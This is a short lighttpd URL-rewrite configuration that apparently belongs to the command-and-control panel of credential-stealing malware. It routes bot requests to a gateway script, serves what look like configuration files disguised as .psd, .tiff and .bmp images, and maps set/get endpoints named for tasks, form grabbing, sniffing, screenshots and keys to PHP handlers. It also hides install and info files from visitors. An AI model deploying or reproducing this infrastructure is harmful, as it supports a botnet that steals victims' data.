url.rewrite = (
	"^/pma/(.*)$" => "pma/$1",
	"^/cfg/(.*)\.(psd|tiff|bmp)$" => "$0",
	"^/(.*)\.(psd|tiff|bmp)$" => "cfg/$0",
    "^/(.*)\.(phtml|phtm|php3|inc|7z|cgi|pl|doc|rtf|tpl|rar)(.*)?$" => "scripts/gateway.php?p=$1",
    "^/(set|get)/(task|first|hunter|cab|fgr|gra|ibn|sni|scr|key|comment)\.html(.*)?" => "scripts/$1/$2.php$3",
)

url.access-deny += ( ".plug", "install.txt", "info.txt" )

